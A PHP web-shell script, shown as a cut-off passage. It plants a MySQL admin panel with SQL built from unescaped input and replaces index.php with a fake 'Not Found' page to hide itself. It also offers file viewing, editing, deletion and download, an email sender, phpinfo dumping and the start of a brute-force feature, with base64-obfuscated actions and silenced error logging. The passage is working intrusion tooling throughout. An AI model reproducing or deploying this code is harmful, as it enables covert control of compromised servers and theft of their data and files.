{\r\n\t\techo \"<input type=text size=4 name=page>\\n\";\r\n\t\techo \"<input type=submit value='Go'>\\n\";\r\n\t}\r\n\techo \"</form>\\n\";\r\n\techo \"</font>\\n\";\r\n}\r\n\r\nfunction manageData( \$cmd ) {\r\n\tglobal \$mysqlHandle, \$dbname, \$tablename, \$PHP_SELF;\r\n\tif( \$cmd == \"add\" )\r\n\t\techo \"<h1>Add Data</h1>\\n\";\r\n\telse if( \$cmd == \"edit\" ) {\r\n\t\techo \"<h1>Edit Data</h1>\\n\";\r\n\t\t\$pResult = mysql_list_fields( \$dbname, \$tablename );\r\n\t\t\$num = mysql_num_fields( \$pResult );\r\n\t\t\$key = \"\";\r\n\t\tfor( \$i = 0; \$i < \$num; \$i++ ) {\r\n\t\t\t\$field = mysql_fetch_field( \$pResult, \$i );\r\n\t\t\tif( \$field->primary_key == 1 )\r\n\t\t\t\tif( \$field->numeric == 1 )\r\n\t\t\t\t\t\$key .= \$field->name . \"=\" . \$GLOBALS[\$field->name] . \" AND \";\r\n\t\t\t\telse\r\n\t\t\t\t\t\$key .= \$field->name . \"='\" . \$GLOBALS[\$field->name] . \"' AND \";\r\n\t\t}\r\n\t\t\$key = substr( \$key, 0, strlen(\$key)-4 );\r\n\t\tmysql_select_db( \$dbname, \$mysqlHandle );\r\n\t\t\$pResult = mysql_query( \$queryStr =  \"SELECT * FROM \$tablename WHERE \$key\", \$mysqlHandle );\r\n\t\t\$data = mysql_fetch_array( \$pResult );\r\n\t}\r\n\techo \"<p class=location>\$dbname &gt; \$tablename</p>\\n\";\r\n\techo \"<form action='\$PHP_SELF' method=post>\\n\";\r\n\tif( \$cmd == \"add\" )\r\n\t\techo \"<input type=hidden name=action value=addData_submit>\\n\";\r\n\telse if( \$cmd == \"edit\" )\r\n\t\techo \"<input type=hidden name=action value=editData_submit>\\n\";\r\n\techo \"<input type=hidden name=dbname value=\$dbname>\\n\";\r\n\techo \"<input type=hidden name=tablename value=\$tablename>\\n\";\r\n\techo \"<table cellspacing=1 cellpadding=2>\\n\";\r\n\techo \"<tr>\\n\";\r\n\techo \"<th>Name</th>\\n\";\r\n\techo \"<th>Type</th>\\n\";\r\n\techo \"<th>Function</th>\\n\";\r\n\techo \"<th>Data</th>\\n\";\r\n\techo \"</tr>\\n\";\r\n\t\$pResult = mysql_db_query( \$dbname, \"SHOW fields FROM \$tablename\" );\r\n\t\$num = mysql_num_rows( \$pResult );\r\n\t\$pResultLen = mysql_list_fields( \$dbname, \$tablename );\r\n\tfor( \$i = 0; \$i < \$num; \$i++ ) {\r\n\t\t\$field = mysql_fetch_array( \$pResult );\r\n\t\t\$fieldname = \$field[\"Field\"];\r\n\t\t\$fieldtype = \$field[\"Type\"];\r\n\t\t\$len = mysql_field_len( \$pResultLen, \$i );\r\n\t\techo \"<tr>\";\r\n\t\techo \"<td>\$fieldname</td>\";\r\n\t\techo \"<td>\".\$field[\"Type\"].\"</td>\";\r\n\t\techo \"<td>\\n\";\r\n\t\techo \"<select name=\${fieldname}_function>\\n\";\r\n\t\techo \"<option>\\n\";\r\n\t\techo \"<option>ASCII\\n\";\r\n\t\techo \"<option>CHAR\\n\";\r\n\t\techo \"<option>SOUNDEX\\n\";\r\n\t\techo \"<option>CURDATE\\n\";\r\n\t\techo \"<option>CURTIME\\n\";\r\n\t\techo \"<option>FROM_DAYS\\n\";\r\n\t\techo \"<option>FROM_UNIXTIME\\n\";\r\n\t\techo \"<option>NOW\\n\";\r\n\t\techo \"<option>PASSWORD\\n\";\r\n\t\techo \"<option>PERIOD_ADD\\n\";\r\n\t\techo \"<option>PERIOD_DIFF\\n\";\r\n\t\techo \"<option>TO_DAYS\\n\";\r\n\t\techo \"<option>USER\\n\";\r\n\t\techo \"<option>WEEKDAY\\n\";\r\n\t\techo \"<option>RAND\\n\";\r\n\t\techo \"</select>\\n\";\r\n\t\techo \"</td>\\n\";\r\n\t\t\$value = htmlspecialchars(\$data[\$i]);\r\n\t\tif( \$cmd == \"add\" ) {\r\n\t\t\t\$type = strtok( \$fieldtype, \" (,)\\n\" );\r\n\t\t\tif( \$type == \"enum\" || \$type == \"set\" ) {\r\n\t\t\t\techo \"<td>\\n\";\r\n\t\t\t\tif( \$type == \"enum\" )\r\n\t\t\t\t\techo \"<select name=\$fieldname>\\n\";\r\n\t\t\t\telse if( \$type == \"set\" )\r\n\t\t\t\t\techo \"<select name=\$fieldname size=4 multiple>\\n\";\r\n\t\t\t\twhile( \$str = strtok( \"'\" ) ) {\r\n\t\t\t\t\techo \"<option>\$str\\n\";\r\n\t\t\t\t\tstrtok( \"'\" );\r\n\t\t\t\t}\r\n\t\t\t\techo \"</select>\\n\";\r\n\t\t\t\techo \"</td>\\n\";\r\n\t\t\t} else {\r\n\t\t\t\tif( \$len < 40 )\r\n\t\t\t\t\techo \"<td><input type=text size=40 maxlength=\$len name=\$fieldname></td>\\n\";\r\n\t\t\t\telse\r\n\t\t\t\t\techo \"<td><textarea cols=40 rows=3 maxlength=\$len name=\$fieldname></textarea>\\n\";\r\n\t\t\t}\r\n\t\t} else if( \$cmd == \"edit\" ) {\r\n\t\t\t\$type = strtok( \$fieldtype, \" (,)\\n\" );\r\n\t\t\tif( \$type == \"enum\" || \$type == \"set\" ) {\r\n\t\t\t\techo \"<td>\\n\";\r\n\t\t\t\tif( \$type == \"enum\" )\r\n\t\t\t\t\techo \"<select name=\$fieldname>\\n\";\r\n\t\t\t\telse if( \$type == \"set\" )\r\n\t\t\t\t\techo \"<select name=\$fieldname size=4 multiple>\\n\";\r\n\t\t\t\twhile( \$str = strtok( \"'\" ) ) {\r\n\t\t\t\t\tif( \$value == \$str )\r\n\t\t\t\t\t\techo \"<option selected>\$str\\n\";\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\techo \"<option>\$str\\n\";\r\n\t\t\t\t\tstrtok( \"'\" );\r\n\t\t\t\t}\r\n\t\t\t\techo \"</select>\\n\";\r\n\t\t\t\techo \"</td>\\n\";\r\n\t\t\t} else {\r\n\t\t\t\tif( \$len < 40 )\r\n\t\t\t\t\techo \"<td><input type=text size=40 maxlength=\$len name=\$fieldname value=\\\"\$value\\\"></td>\\n\";\r\n\t\t\t\telse\r\n\t\t\t\t\techo \"<td><textarea cols=40 rows=3 maxlength=\$len name=\$fieldname>\$value</textarea>\\n\";\r\n\t\t\t}\r\n\t\t}\r\n\t\techo \"</tr>\";\r\n\t}\r\n\techo \"</table><p>\\n\";\r\n\tif( \$cmd == \"add\" )\r\n\t\techo \"<input type=submit value='Add Data'>\\n\";\r\n\telse if( \$cmd == \"edit\" )\r\n\t\techo \"<input type=submit value='Edit Data'>\\n\";\r\n\techo \"<input type=button value='Cancel' onClick='history.back()'>\\n\";\r\n\techo \"</form>\\n\";\r\n}\r\n\r\nfunction manageData_submit( \$cmd ) {\r\n\tglobal \$mysqlHandle, \$dbname, \$tablename, \$fieldname, \$PHP_SELF, \$queryStr, \$errMsg;\r\n\t\$pResult = mysql_list_fields( \$dbname, \$tablename );\r\n\t\$num = mysql_num_fields( \$pResult );\r\n\tmysql_select_db( \$dbname, \$mysqlHandle );\r\n\tif( \$cmd == \"add\" )\r\n\t\t\$queryStr = \"INSERT INTO \$tablename VALUES (\";\r\n\telse if( \$cmd == \"edit\" )\r\n\t\t\$queryStr = \"REPLACE INTO \$tablename VALUES (\";\r\n\tfor( \$i = 0; \$i < \$num-1; \$i++ ) {\r\n\t\t\$field = mysql_fetch_field( \$pResult );\r\n\t\t\$func = \$GLOBALS[\$field->name.\"_function\"];\r\n\t\tif( \$func != \"\" )\r\n\t\t\t\$queryStr .= \" \$func(\";\r\n\t\tif( \$field->numeric == 1 ) {\r\n\t\t\t\$queryStr .= \$GLOBALS[\$field->name];\r\n\t\t\tif( \$func != \"\" )\r\n\t\t\t\t\$queryStr .= \"),\";\r\n\t\t\telse\r\n\t\t\t\t\$queryStr .= \",\";\r\n\t\t} else {\r\n\t\t\t\$queryStr .= \"'\" . \$GLOBALS[\$field->name];\r\n\t\t\tif( \$func != \"\" )\r\n\t\t\t\t\$queryStr .= \"'),\";\r\n\t\t\telse\r\n\t\t\t\t\$queryStr .= \"',\";\r\n\t\t}\r\n\t}\r\n\t\$field = mysql_fetch_field( \$pResult );\r\n\tif( \$field->numeric == 1 )\r\n\t\t\$queryStr .= \$GLOBALS[\$field->name] . \")\";\r\n\telse\r\n\t\t\$queryStr .= \"'\" . \$GLOBALS[\$field->name] . \"')\";\r\n\tmysql_query( \$queryStr , \$mysqlHandle );\r\n\t\$errMsg = mysql_error();\r\n\tviewData( \"\" );\r\n}\r\n\r\nfunction deleteData() {\r\n\tglobal \$mysqlHandle, \$dbname, \$tablename, \$fieldname, \$PHP_SELF, \$queryStr, \$errMsg;\r\n\t\$pResult = mysql_list_fields( \$dbname, \$tablename );\r\n\t\$num = mysql_num_fields( \$pResult );\r\n\t\$key = \"\";\r\n\tfor( \$i = 0; \$i < \$num; \$i++ ) {\r\n\t\t\$field = mysql_fetch_field( \$pResult, \$i );\r\n\t\tif( \$field->primary_key == 1 )\r\n\t\t\tif( \$field->numeric == 1 )\r\n\t\t\t\t\$key .= \$field->name . \"=\" . \$GLOBALS[\$field->name] . \" AND \";\r\n\t\t\telse\r\n\t\t\t\t\$key .= \$field->name . \"='\" . \$GLOBALS[\$field->name] . \"' AND \";\r\n\t}\r\n\t\$key = substr( \$key, 0, strlen(\$key)-4 );\r\n\tmysql_select_db( \$dbname, \$mysqlHandle );\r\n\t\$queryStr =  \"DELETE FROM \$tablename WHERE \$key\";\r\n\tmysql_query( \$queryStr, \$mysqlHandle );\r\n\t\$errMsg = mysql_error();\r\n\tviewData( \"\" );\r\n}\r\n\r\nfunction fetch_table_dump_sql(\$table)\r\n{\r\n\tglobal \$mysqlHandle,\$dbname;\r\n\tmysql_select_db( \$dbname, \$mysqlHandle );\r\n\t\$query_id = mysql_query(\"SHOW CREATE TABLE \$table\",\$mysqlHandle);\r\n\t\$tabledump = mysql_fetch_array(\$query_id, MYSQL_ASSOC);\r\n\t\$tabledump = \"DROP TABLE IF EXISTS \$table;\\n\" . \$tabledump['Create Table'] . \";\\n\\n\";\r\n\techo \$tabledump;\r\n\t// get data\r\n\t\$rows = mysql_query(\"SELECT * FROM \$table\",\$mysqlHandle);\r\n\t\$numfields=mysql_num_fields(\$rows);\r\n\twhile (\$row = mysql_fetch_array(\$rows, MYSQL_NUM))\r\n\t{\r\n\t\t\$tabledump = \"INSERT INTO \$table VALUES(\";\r\n\t\t\$fieldcounter = -1;\r\n\t\t\$firstfield = 1;\r\n\t\t// get each field's data\r\n\t\twhile (++\$fieldcounter < \$numfields)\r\n\t\t{\r\n\t\t\tif (!\$firstfield)\r\n\t\t\t{\r\n\t\t\t\t\$tabledump .= ', ';\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t\$firstfield = 0;\r\n\t\t\t}\r\n\t\t\tif (!isset(\$row[\"\$fieldcounter\"]))\r\n\t\t\t{\r\n\t\t\t\t\$tabledump .= 'NULL';\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t\$tabledump .= \"'\" . mysql_escape_string(\$row[\"\$fieldcounter\"]) . \"'\";\r\n\t\t\t}\r\n\t\t}\r\n\t\t\$tabledump .= \");\\n\";\r\n\t\techo \$tabledump;\r\n\t}\r\n\t@mysql_free_result(\$rows);\r\n}\r\n\r\nfunction dump() {\r\n\tglobal \$mysqlHandle, \$action, \$dbname, \$tablename;\r\n\tif( \$action == \"dumpTable\" ){\r\n\t\theader(\"Content-disposition: filename=\$tablename.sql\");\r\n\t\theader('Content-type: unknown/unknown');\r\n\t\tfetch_table_dump_sql(\$tablename);\r\n\t\techo \"\\n\\n\\n\";\r\n\t\techo \"\\r\\n\\r\\n\\r\\n### \$tablename TABLE DUMP COMPLETED ###\";\r\n\t\texit;\r\n\t}else{\r\n\t\theader(\"Content-disposition: filename=\$dbname.sql\");\r\n\t\theader('Content-type: unknown/unknown');\r\n\t\tmysql_select_db( \$dbname, \$mysqlHandle );\r\n\t\t\$query_id = mysql_query(\"SHOW tables\",\$mysqlHandle);\r\n\t\twhile (\$row = mysql_fetch_array(\$query_id, MYSQL_NUM))\r\n\t\t{\r\n\t\t\t\tfetch_table_dump_sql(\$row[0]);\r\n\t\t\t\techo \"\\n\\n\\n\";\r\n\t\t\t\techo \"\\r\\n\\r\\n\\r\\n### \$row[0] TABLE DUMP COMPLETED ###\";\r\n\t\t\t\techo \"\\n\\n\\n\";\r\n\t\t}\r\n\t\techo \"\\r\\n\\r\\n\\r\\n### \$dbname DATABASE DUMP COMPLETED ###\";\r\n\t\texit;\r\n\t}\r\n}\r\n\r\nfunction utils() {\r\n\tglobal \$PHP_SELF, \$command;\r\n\techo \"<h1>Utilities</h1>\\n\";\r\n\tif( \$command == \"\" || substr( \$command, 0, 5 ) == \"flush\" ) {\r\n\t\techo \"<hr>\\n\";\r\n\t\techo \"Show\\n\";\r\n\t\techo \"<ul>\\n\";\r\n\t\techo \"<li><a href='\$PHP_SELF?action=utils&command=show_status'>Status</a>\\n\";\r\n\t\techo \"<li><a href='\$PHP_SELF?action=utils&command=show_variables'>Variables</a>\\n\";\r\n\t\techo \"<li><a href='\$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\\n\";\r\n\t\techo \"</ul>\\n\";\r\n\t\techo \"Flush\\n\";\r\n\t\techo \"<ul>\\n\";\r\n\t\techo \"<li><a href='\$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\\n\";\r\n\t\tif( \$command == \"flush_hosts\" ) {\r\n\t\t\tif( mysql_query( \"Flush hosts\" ) != false )\r\n\t\t\t\techo \"- Success\";\r\n\t\t\telse\r\n\t\t\t\techo \"- Fail\";\r\n\t\t}\r\n\t\techo \"<li><a href='\$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\\n\";\r\n\t\tif( \$command == \"flush_logs\" ) {\r\n\t\t\tif( mysql_query( \"Flush logs\" ) != false )\r\n\t\t\t\techo \"- Success\";\r\n\t\t\telse\r\n\t\t\t\techo \"- Fail\";\r\n\t\t}\r\n\t\techo \"<li><a href='\$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\\n\";\r\n\t\tif( \$command == \"flush_privileges\" ) {\r\n\t\t\tif( mysql_query( \"Flush privileges\" ) != false )\r\n\t\t\t\techo \"- Success\";\r\n\t\t\telse\r\n\t\t\t\techo \"- Fail\";\r\n\t\t}\r\n\t\techo \"<li><a href='\$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\\n\";\r\n\t\tif( \$command == \"flush_tables\" ) {\r\n\t\t\tif( mysql_query( \"Flush tables\" ) != false )\r\n\t\t\t\techo \"- Success\";\r\n\t\t\telse\r\n\t\t\t\techo \"- Fail\";\r\n\t\t}\r\n\t\techo \"<li><a href='\$PHP_SELF?action=utils&command=flush_status'>Status</a>\\n\";\r\n\t\tif( \$command == \"flush_status\" ) {\r\n\t\t\tif( mysql_query( \"Flush status\" ) != false )\r\n\t\t\t\techo \"- Success\";\r\n\t\t\telse\r\n\t\t\t\techo \"- Fail\";\r\n\t\t}\r\n\t\techo \"</ul>\\n\";\r\n\t} else {\r\n\t\t\$queryStr = ereg_replace( \"_\", \" \", \$command );\r\n\t\t\$pResult = mysql_query( \$queryStr );\r\n\t\tif( \$pResult == false ) {\r\n\t\t\techo \"Fail\";\r\n\t\t\treturn;\r\n\t\t}\r\n\t\t\$col = mysql_num_fields( \$pResult );\r\n\t\techo \"<p class=location>\$queryStr</p>\\n\";\r\n\t\techo \"<hr>\\n\";\r\n\t\techo \"<table cellspacing=1 cellpadding=2 border=0>\\n\";\r\n\t\techo \"<tr>\\n\";\r\n\t\tfor( \$i = 0; \$i < \$col; \$i++ ) {\r\n\t\t\t\$field = mysql_fetch_field( \$pResult, \$i );\r\n\t\t\techo \"<th>\".\$field->name.\"</th>\\n\";\r\n\t\t}\r\n\t\techo \"</tr>\\n\";\r\n\t\twhile( 1 ) {\r\n\t\t\t\$rowArray = mysql_fetch_row( \$pResult );\r\n\t\t\tif( \$rowArray == false ) break;\r\n\t\t\techo \"<tr>\\n\";\r\n\t\t\tfor( \$j = 0; \$j < \$col; \$j++ )\r\n\t\t\t\techo \"<td>\".htmlspecialchars( \$rowArray[\$j] ).\"</td>\\n\";\r\n\t\t\techo \"</tr>\\n\";\r\n\t\t}\r\n\t\techo \"</table>\\n\";\r\n\t}\r\n}\r\nfunction footer_html() {\r\n\tglobal \$mysqlHandle, \$dbname, \$tablename, \$PHP_SELF, \$USERNAME;\r\n\techo \"<hr>\\n\";\r\n\techo \"<span class=\\\"new\\\">[\$USERNAME]</span> - \\n\";\r\n\techo \"<a href='\$PHP_SELF?action=bGlzdERCcw=='>Database List</a> | \\n\";\r\n\tif( \$tablename != \"\" )\r\n\t\techo \"<a href='\$PHP_SELF?action=listTables&dbname=\$dbname&tablename=\$tablename'>Table List</a> | \";\r\n\techo \"<a href='\$PHP_SELF?action=utils'>Utils</a> |\\n\";\r\n\techo \"<a href='\$PHP_SELF?action=logout'>Logout</a>\\n\";\r\n}\r\n//------------- MAIN ------------- //\r\nerror_reporting(0);\r\nini_set ('display_errors', 0);\r\nini_set ('log_errors', 0);\r\nif( \$action == \"logon\" || \$action == \"\" || \$action == \"logout\" )\r\n\tlogon();\r\nelse if( \$action == \"bG9nb25fc3VibWl0\" )\r\n\tlogon_submit();\r\nelse if( \$action == \"dumpTable\" || \$action == \"dumpDB\" ) {\r\n\twhile( list(\$var, \$value) = each(\$HTTP_COOKIE_VARS) ) {\r\n\t\tif( \$var == \"mysql_web_admin_username\" ) \$USERNAME = \$value;\r\n\t\tif( \$var == \"mysql_web_admin_password\" ) \$PASSWORD = \$value;\r\n\t\tif( \$var == \"mysql_web_admin_hostname\" ) \$HOSTNAME = \$value;\r\n\t}\r\n\t\$mysqlHandle = @mysql_connect( \$HOSTNAME.\":3306\", \$USERNAME, \$PASSWORD );\r\n\tdump();\r\n} else {\r\n\twhile( list(\$var, \$value) = each(\$HTTP_COOKIE_VARS) ) {\r\n\t\tif( \$var == \"mysql_web_admin_username\" ) \$USERNAME = \$value;\r\n\t\tif( \$var == \"mysql_web_admin_password\" ) \$PASSWORD = \$value;\r\n\t\tif( \$var == \"mysql_web_admin_hostname\" ) \$HOSTNAME = \$value;\r\n\t}\r\n\techo \"<!--\";\r\n\t\$mysqlHandle = @mysql_connect( \$HOSTNAME.\":3306\", \$USERNAME, \$PASSWORD );\r\n\techo \"-->\";\r\n\tif( \$mysqlHandle == false ) {\r\n\t\techo \"<table width=100% height=100%><tr><td><center>\\n\";\r\n\t\techo \"<h1>Wrong Password!</h1>\\n\";\r\n\t\techo \"<a href='\$PHP_SELF?action=logon'>Logon</a>\\n\";\r\n\t\techo \"</center></td></tr></table>\\n\";\r\n\t} else {\r\n\t\tif( \$action == \"bGlzdERCcw==\" )\r\n\t\t\tlistDatabases();\r\n\t\telse if( \$action == \"createDB\" )\r\n\t\t\tcreateDatabase();\r\n\t\telse if( \$action == \"dropDB\" )\r\n\t\t\tdropDatabase();\r\n\t\telse if( \$action == \"listTables\" )\r\n\t\t\tlistTables();\r\n\t\telse if( \$action == \"createTable\" )\r\n\t\t\tcreateTable();\r\n\t\telse if( \$action == \"dropTable\" )\r\n\t\t\tdropTable();\r\n\t\telse if( \$action == \"viewSchema\" )\r\n\t\t\tviewSchema();\r\n\t\telse if( \$action == \"query\" )\r\n\t\t\tviewData( \$queryStr );\r\n\t\telse if( \$action == \"addField\" )\r\n\t\t\tmanageField( \"add\" );\r\n\t\telse if( \$action == \"addField_submit\" )\r\n\t\t\tmanageField_submit( \"add\" );\r\n\t\telse if( \$action == \"editField\" )\r\n\t\t\tmanageField( \"edit\" );\r\n\t\telse if( \$action == \"editField_submit\" )\r\n\t\t\tmanageField_submit( \"edit\" );\r\n\t\telse if( \$action == \"dropField\" )\r\n\t\t\tdropField();\r\n\t\telse if( \$action == \"dmlld0RhdGE=\" )\r\n\t\t\tviewData( \"\" );\r\n\t\telse if( \$action == \"addData\" )\r\n\t\t\tmanageData( \"add\" );\r\n\t\telse if( \$action == \"addData_submit\" )\r\n\t\t\tmanageData_submit( \"add\" );\r\n\t\telse if( \$action == \"editData\" )\r\n\t\t\tmanageData( \"edit\" );\r\n\t\telse if( \$action == \"editData_submit\" )\r\n\t\t\tmanageData_submit( \"edit\" );\r\n\t\telse if( \$action == \"deleteData\" )\r\n\t\t\tdeleteData();\r\n\t\telse if( \$action == \"utils\" )\r\n\t\t\tutils();\r\n\t\tmysql_close( \$mysqlHandle);\r\n\t\tfooter_html();\r\n\t}\r\n}\r\n?>\r\n<html>\r\n<head>\r\n<title>MySQL Interface (Developed By Mohajer22)</title>\r\n<body bgColor=#000000 >\r\n<style type=\"text/css\">\r\n<!--\r\np.location {\r\n\tcolor: #00FF00;\r\n}\r\nh1, h2, h3 {\r\n\tcolor: #00FF00;\r\n}\r\nth {\r\n\tbackground-color: #222222;\r\n\tcolor: #00FF00;\r\n\tfont-size: small;\r\n}\r\ntd {\r\n\tcolor: #00FF00;\r\n\tbackground-color: #444444;\r\n\tfont-size: small;\r\n}\r\nform {\r\n\tmargin-top: 0;\r\n\tmargin-bottom: 0;\r\n}\r\na {\r\n\ttext-decoration:none;\r\n\tcolor: #00FF00;\r\n\tfont-size:small;\r\n}\r\nA:link {\r\nCOLOR:#FFFFFF;\r\nTEXT-DECORATION: none\r\n}\r\nA:visited {\r\nCOLOR:#00FF00;\r\nTEXT-DECORATION: none\r\n}\r\nA:active {\r\nCOLOR:#00FF00;\r\nTEXT-DECORATION: none\r\n}\r\nA:hover {\r\ncolor:#00FF00;\r\nTEXT-DECORATION: none\r\n}\r\ninput, select, textarea {\r\nbackground-color: #000000;\r\nborder-style: solid;\r\nfont-family: Tahoma,Verdana,Arial,Sans-Serif;\r\nfont-size:small;\r\ncolor: #00FF00;\r\npadding: 0px;\r\n}\r\nli {\r\ncolor: #00FF00;\r\n}\r\n.new {\r\ncolor: #00FF00;\r\n}\r\n//-->\r\n</style>\r\n</head>");
        fclose($file);
        chmod("db-sql.php", 0644);
        $indexshell = fopen("index.php", "w+");
        $data = 'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+';
        $tulis = fwrite($indexshell, "<h1>Not Found</h1> \r\n<p>The requested URL was not found on this server.</p> \r\n<hr> \r\n<address>Apache Server at <?=\$_SERVER['HTTP_HOST']?> Port 80</address> \r\n    <style> \r\n        input { margin:0;background-color:#fff;border:1px solid #fff; } \r\n    </style>");
        fclose($indexshell);
        echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'mail') {
        if (isset($_POST['mail_send'])) {
            $mail_to = $_POST['mail_to'];
            $mail_from = $_POST['mail_from'];
            $mail_subject = $_POST['mail_subject'];
            $mail_content = magicboom($_POST['mail_content']);
            if (@mail($mail_to, $mail_subject, $mail_content, "FROM:{$mail_from}")) {
                $msg = "email sent to {$mail_to}";
            } else {
                $msg = "send email failed";
            }
        }
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=mail" method="post">
<table class="cmdbox">
<tr><td>
<textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea>
<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />&nbsp; mail to</td></tr>
<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />&nbsp; from</td></tr>
<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr>
<tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>
<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php 
        echo $msg;
        ?></td></tr>
</table>
</form>

<?php 
    } elseif (isset($_GET['x']) && $_GET['x'] == 'phpinfo') {
        @ob_start();
        @phpinfo();
        $buff = @ob_get_contents();
        @ob_end_clean();
        $awal = strpos($buff, "<body>") + 6;
        $akhir = strpos($buff, "</body>");
        echo "<div class=\"phpinfo\">" . substr($buff, $awal, $akhir - $awal) . "</div>";
    } elseif (isset($_GET['view']) && $_GET['view'] != "") {
        if (is_file($_GET['view'])) {
            if (!isset($file)) {
                $file = magicboom($_GET['view']);
            }
            if (!$win && $posix) {
                $name = @posix_getpwuid(@fileowner($folder));
                $group = @posix_getgrgid(@filegroup($folder));
                $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
            } else {
                $owner = $user;
            }
            $filn = basename($file);
            echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">\r\n\t<tr><td>Filename</td><td><span id=\"" . clearspace($filn) . "_link\">" . $file . "</span>\r\n\t<form action=\"?y=" . $pwd . "&amp;view={$file}\" method=\"post\" id=\"" . clearspace($filn) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">\r\n\t\t<input type=\"hidden\" name=\"oldname\" value=\"" . $filn . "\" style=\"margin:0;padding:0;\" />\r\n\t\t<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $filn . "\" />\r\n\t\t<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />\r\n\t\t<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($filn) . "_link','" . clearspace($filn) . "_form');\" />\r\n\t</form>\r\n\t</td></tr>\r\n\t<tr><td>Size</td><td>" . ukuran($file) . "</td></tr>\r\n\t<tr><td>Permission</td><td>" . get_perms($file) . "</td></tr>\r\n\t<tr><td>Owner</td><td>" . $owner . "</td></tr>\r\n\t<tr><td>Create time</td><td>" . date("d-M-Y H:i", @filectime($file)) . "</td></tr>\r\n\t<tr><td>Last modified</td><td>" . date("d-M-Y H:i", @filemtime($file)) . "</td></tr>\r\n\t<tr><td>Last accessed</td><td>" . date("d-M-Y H:i", @fileatime($file)) . "</td></tr>\r\n\t<tr><td>Actions</td><td><a href=\"?y={$pwd}&amp;edit={$file}\">edit</a> | <a href=\"javascript:tukar('" . clearspace($filn) . "_link','" . clearspace($filn) . "_form');\">rename</a> | <a href=\"?y={$pwd}&amp;delete={$file}\">delete</a> | <a href=\"?y={$pwd}&amp;dl={$file}\">download</a>&nbsp;(<a href=\"?y={$pwd}&amp;dlgzip={$file}\">gzip</a>)</td></tr>\r\n\t<tr><td>View</td><td><a href=\"?y=" . $pwd . "&amp;view=" . $file . "\">text</a> | <a href=\"?y=" . $pwd . "&amp;view=" . $file . "&amp;type=code\">code</a> | <a href=\"?y=" . $pwd . "&amp;view=" . $file . "&amp;type=image\">image</a></td></tr>\r\n\t</table>\r\n\t";
            if (isset($_GET['type']) && $_GET['type'] == 'image') {
                echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=" . $pwd . "&amp;img=" . $filn . "\"></div>";
            } elseif (isset($_GET['type']) && $_GET['type'] == 'code') {
                echo "<div class=\"viewfile\">";
                $file = wordwrap(@file_get_contents($file), "240", "\n");
                @highlight_string($file);
                echo "</div>";
            } else {
                echo "<div class=\"viewfile\">";
                echo nl2br(htmlentities(@file_get_contents($file)));
                echo "</div>";
            }
        } elseif (is_dir($_GET['view'])) {
            echo showdir($pwd, $prompt);
        }
    } elseif (isset($_GET['edit']) && $_GET['edit'] != "") {
        if (isset($_POST['save'])) {
            $file = $_POST['saveas'];
            $content = magicboom($_POST['content']);
            if ($filez = @fopen($file, "w")) {
                $time = date("d-M-Y H:i", time());
                if (@fwrite($filez, $content)) {
                    $msg = "file saved <span class=\"gaya\">@</span> " . $time;
                } else {
                    $msg = "failed to save";
                }
                @fclose($filez);
            } else {
                $msg = "permission denied";
            }
        }
        if (!isset($file)) {
            $file = $_GET['edit'];
        }
        if ($filez = @fopen($file, "r")) {
            $content = "";
            while (!feof($filez)) {
                $content .= htmlentities(str_replace("''", "'", fgets($filez)));
            }
            @fclose($filez);
        }
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;edit=<?php 
        echo $file;
        ?>" method="post">
<table class="cmdbox">
<tr><td colspan="2">
<textarea class="output" name="content">
<?php 
        echo $content;
        ?>
</textarea>
<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php 
        echo $file;
        ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
&nbsp;<?php 
        echo $msg;
        ?></td></tr>
</table>
</form>
<?php 
    } elseif (isset($_GET['x']) && $_GET['x'] == 'logout') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=logout" method="post">

<?php 
        unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
        echo "bye!";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'brute') {
        ?>
				<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=brute" method="post">
			<?php 
        //bruteforce
        ?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php 
        /*
